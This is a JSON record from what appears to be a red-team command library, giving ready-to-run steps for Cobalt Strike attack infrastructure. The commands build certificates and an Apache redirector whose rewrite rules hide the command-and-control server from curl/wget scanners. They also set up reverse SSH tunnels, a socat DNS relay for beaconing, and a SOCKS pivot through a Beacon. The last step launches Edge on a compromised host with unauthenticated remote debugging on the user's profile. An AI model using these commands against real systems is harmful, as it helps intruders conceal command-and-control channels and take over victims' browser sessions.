{ "name": "Cobalt Strike", "phases": [ "00. Infrastructure" ], "category": "", "stealthy": false, "platforms": [ "Windows", "Linux" ], "source": "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm", "description": "Cobalt Strike is a platform for adversary simulations and red team operations. The product is designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors.", "undetected": [], "detected": [], "commands": [ { "id": "1911bd14-d626-4e98-9938-15398478f49f", "name": "Add certificate to server", "description": "", "tag": "", "results": [], "cmd": "#Generate an RSA private key and a self-signed certificate (CN=localhost). A self-signed localhost certificate is trivial to fingerprint: on anything reachable from the target network use a certificate for your real domain instead (see 'Generate SSL certificate')\nopenssl req -x509 -nodes -newkey rsa:2048 -keyout localhost.key -out localhost.crt -sha256 -days 365 -subj '/CN=localhost'\n#combine the separate public and private files into a single PFX file\nopenssl pkcs12 -inkey localhost.key -in localhost.crt -export -out localhost.pfx\n#convert the PFX file to a Java KeyStore; remember the destination keystore password you set here\nkeytool -importkeystore -srckeystore localhost.pfx -srcstoretype pkcs12 -destkeystore localhost.store\n#upload to the Cobalt Strike directory on the team server\nscp localhost.store attacker@10.10.10.10:/home/attacker/cobaltstrike/\n#add to the malleable profile (password must be the keystore password chosen in the keytool step)\nhttps-certificate {\n set keystore \"localhost.store\";\n set password \"password\";\n}" }, { "id": "f6feb24b-9f33-4ff8-8332-41c624e63bb1", "name": "Setup redirector", "description": "", "tag": "", "results": [], "cmd": "sudo apt install apache2\nsudo a2enmod ssl rewrite proxy proxy_http\n#cd is a shell builtin, so it cannot be run through sudo\ncd /etc/apache2/sites-enabled\nsudo rm 000-default.conf\nsudo ln -s ../sites-available/default-ssl.conf .\nsudo systemctl restart apache2" }, { "id": "cb900e82-c79e-4b35-b015-a222a5e1a159", "name": "Generate SSL certificate", "description": "", "tag": "", "results": [], "cmd": "openssl genrsa -out ecorp.key 2048\nopenssl req -new -key ecorp.key -out ecorp.csr\n#identify the path to your CA in this example /home/attacker/ca/\n#create the X.509 v3 extension file 
ecorp.ext\nauthorityKeyIdentifier=keyid,issuer\nbasicConstraints=CA:FALSE\nkeyUsage = digitalSignature, nonRepudiation, keyEncipherment, dataEncipherment\nsubjectAltName = @alt_names\n\n[alt_names]\nDNS.1 = ecorp.com\nDNS.2 = www.ecorp.com\n#sign the CSR with the CA; the extension file supplies the SANs that clients actually validate\nopenssl x509 -req -in ecorp.csr -CA ca/ca.crt -CAkey ca/ca.key -CAcreateserial -out ecorp.crt -days 365 -sha256 -extfile ca/ecorp.ext\n#view cert\nopenssl x509 -noout -text -in ecorp.crt\n#upload key and cert to the redirector; the remaining commands run on the redirector\nscp ecorp.key attacker@10.10.0.100:/home/attacker/private.key\nscp ecorp.crt attacker@10.10.0.100:/home/attacker/public.crt\nsudo cp private.key /etc/ssl/private/\nsudo cp public.crt /etc/ssl/certs/\n#keep the private key readable by root only\nsudo chmod 600 /etc/ssl/private/private.key\n#change apache2 config (paths must match where the files were copied above)\nsudo nano /etc/apache2/sites-enabled/default-ssl.conf\n+SSLCertificateKeyFile /etc/ssl/private/private.key\n+SSLCertificateFile /etc/ssl/certs/public.crt\nsudo systemctl restart apache2" }, { "id": "5188e899-ecc7-40ff-adf7-22c481818012", "name": "Connect redirector with teamserver", "description": "-N: do not execute a remote command (tunnel only, no shell).\n-R is remote-port:host:host-port. 
Bind port 8443 on the redirector (loopback only by default, unless sshd has GatewayPorts enabled) and any traffic sent to it is tunnelled to 127.0.0.1:443 on the team server.", "tag": "", "results": [], "cmd": "#reverse SSH tunnel, run from the team server: the team server's 443 is never exposed directly, only through the redirector\nssh -N -R 8443:localhost:443 redirector@10.10.10.10\n#make the redirector trust the team server's self-signed CN=localhost certificate presented on the proxied https://localhost:8443 hop\nscp localhost.crt redirector@10.10.10.10:/home/attacker/\nsudo cp localhost.crt /usr/local/share/ca-certificates/\nsudo update-ca-certificates\n#add apache2 config (AllowOverride All is what enables the .htaccess below; Indexes is left out so the redirector never serves a directory listing)\nsudo nano /etc/apache2/sites-enabled/default-ssl.conf\n--\n<Directory /var/www/html/>\n Options FollowSymLinks MultiViews\n AllowOverride All\n Require all granted\n</Directory>\nSSLProxyEngine on\n--\n#add a fake 404 page (it is served as a normal 200 response)\necho \"404\" | sudo tee /var/www/html/404\n#rewrite rules: user_agent curl or wget => fake 404 for every path (the pattern must match every path); existing files are served as-is; only requests carrying a SESSIONID cookie are proxied to the team server; anything else falls through to Apache's default handling\nsudo nano /var/www/html/.htaccess\n--\nRewriteEngine on\n\nRewriteCond %{HTTP_USER_AGENT} curl|wget [NC]\nRewriteRule ^.*$ 404 [PT]\n\nRewriteCond /var/www/html/%{REQUEST_URI} -f\nRewriteRule ^.*$ %{REQUEST_FILENAME} [L]\n\nRewriteCond %{HTTP_COOKIE} SESSIONID\nRewriteRule ^.*$ https://localhost:8443%{REQUEST_URI} [P]\n--" }, { "id": "9c6d8fec-47c0-4c90-81c7-80dd680ae17a", "name": "DNS redirector", "description": "SSH into redirector-2 from the team server and set up a port forward between ports 5353 on both the redirector and team server; socat relays DNS (UDP 53) over that TCP tunnel on each side", "tag": "", "results": [], "cmd": "#DNS records in the ecorp.com zone: ns1 points at redirector-2 (A), dns.ecorp.com is delegated to ns1 (NS)\nName\tType\tData\nns1\t A\t 10.10.0.200\ndns\t NS\t ns1.ecorp.com.\n\n#run from the team server: redirector-2's TCP 5353 is forwarded to the team server's local 5353\nssh attacker@10.10.0.200 -R 5353:localhost:5353\n#on redirector-2: use socat to listen on UDP 53 and forward the traffic to TCP 5353 (the SSH tunnel)\nsudo socat udp4-listen:53,reuseaddr,fork tcp:localhost:5353\n#on the team server: use socat to listen on TCP 5353 and forward the traffic to the DNS listener on UDP 53\nsudo socat tcp-listen:5353,reuseaddr,fork udp4-sendto:localhost:53" }, { "id": "78f5ce18-ca91-4c7c-ad1a-1785ca974333", "name": "Setup SOCKS", "description": "Beacon command: start a SOCKS5 proxy on port 9999 of the team server that pivots through this Beacon. The listener is unauthenticated by default, so restrict who can reach that port on the team server.", "tag": "", "results": [ "PROTO:SOCKS" ], "cmd": "socks 9999 socks5" }, { "id": "7445ce18-ca91-4c7c-ad1a-1785ca974333", "name": "Spawn Microsoft Edge (Chromium) in remote debug mode", 
"description": "Launches Microsoft Edge headless with the DevTools remote-debugging protocol listening on TCP 9222. --remote-debugging-address=0.0.0.0 binds it on every interface with no authentication: anyone who can reach 9222 can drive the browser and read whatever its profile holds, so prefer the default 127.0.0.1 binding plus a port forward or the SOCKS pivot unless network exposure is deliberate. --ignore-certificate-errors disables TLS validation for the session. Check that --user-data-dir points at the profile you intend to use (Edge's default lives under %LOCALAPPDATA%\\Microsoft\\Edge\\User Data); a path that does not exist yields a fresh, empty profile.", "tag": "", "requirements": { "tag": "TOOL:CHROMIUM" }, "results": [ "EXECUTION:REMOTE" ], "cmd": "execute 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe' --remote-debugging-port=9222 --remote-debugging-address=0.0.0.0 --user-data-dir=%appdata%\\Microsoft\\Edge --headless --ignore-certificate-errors about:blank" } ], "content": "", "references": [] }